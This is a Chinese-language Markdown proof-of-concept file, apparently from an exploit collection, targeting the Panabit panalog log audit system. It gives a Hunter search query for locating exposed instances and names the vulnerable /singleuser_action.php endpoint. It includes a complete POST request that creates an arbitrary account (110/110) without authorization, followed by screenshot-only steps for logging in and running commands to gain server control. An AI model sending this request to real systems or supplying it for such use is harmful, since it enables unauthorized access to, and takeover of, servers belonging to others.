POC/wpoc/Panabit/panabit日志审计系统/panabit日志审计系统任意用户创建漏洞和后台命令执行.md

57 lines
2.5 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# panabit日志审计系统任意用户创建漏洞和后台命令执行
# 一、漏洞简介
panalog为北京派网软件有限公司一款流量分析日志分析管理的一款软件。存在任意用户创建漏洞和后台命令执行漏洞可先通过任意用户创建然后进行后台命令执行获取服务器权限。
# 二、影响版本
+ Panabit panalog
# 三、资产测绘
+ hunter`app.name="Panabit 日志系统"`
+ 特征
![1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png](./img/R_hiEBQ2rdg129pi/1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f-738731.png)
# 四、漏洞复现
访问连接出现如下页面表示可能存在漏洞
```plain
/singleuser_action.php
```
![1699192303959-b1514c8f-87a3-43de-bcb8-8eaf81585fe8.png](./img/R_hiEBQ2rdg129pi/1699192303959-b1514c8f-87a3-43de-bcb8-8eaf81585fe8-569687.png)
通过POC添加用户
```plain
POST /singleuser_action.php HTTP/1.1
Host: xx.xx.xx.xx
Cookie: PHPSESSID=4dkc7q5hu7lkdlsfm5a0tcirn6
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 578
{ "syncInfo": { "user": { "userId": "110", "userName": "110", "employeeId": "110", "departmentId": "110", "departmentName": "110", "coporationId": "110", "corporationName": "110", "userSex": "1", "userDuty": "110", "userBirthday": "110", "userPost": "110", "userPostCode": "110", "userAlias": "110", "userRank": "110", "userPhone": "110", "userHomeAddress": "110", "userMobilePhone": "110", "userMailAddress": "110", "userMSN": "110", "userNt": "110", "userCA": "110", "userPwd": "110", "userClass": "110", "parentId": "110", "bxlx": "110" },"operationType": "ADD_USER" } }
```
![1699192359593-ce854b7d-6a70-4afb-9b8d-8ec24a96b220.png](./img/R_hiEBQ2rdg129pi/1699192359593-ce854b7d-6a70-4afb-9b8d-8ec24a96b220-349214.png)
使用添加的账户`110/110`
![1699192394802-63091860-1fae-479d-bece-9557ffa15489.png](./img/R_hiEBQ2rdg129pi/1699192394802-63091860-1fae-479d-bece-9557ffa15489-628593.png)
执行命令
![1699192639614-2727f7d1-d406-4477-a921-e6d67ca480f9.png](./img/R_hiEBQ2rdg129pi/1699192639614-2727f7d1-d406-4477-a921-e6d67ca480f9-644917.png)
> 更新: 2024-02-29 23:57:14
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lr43i377pvqttwpn>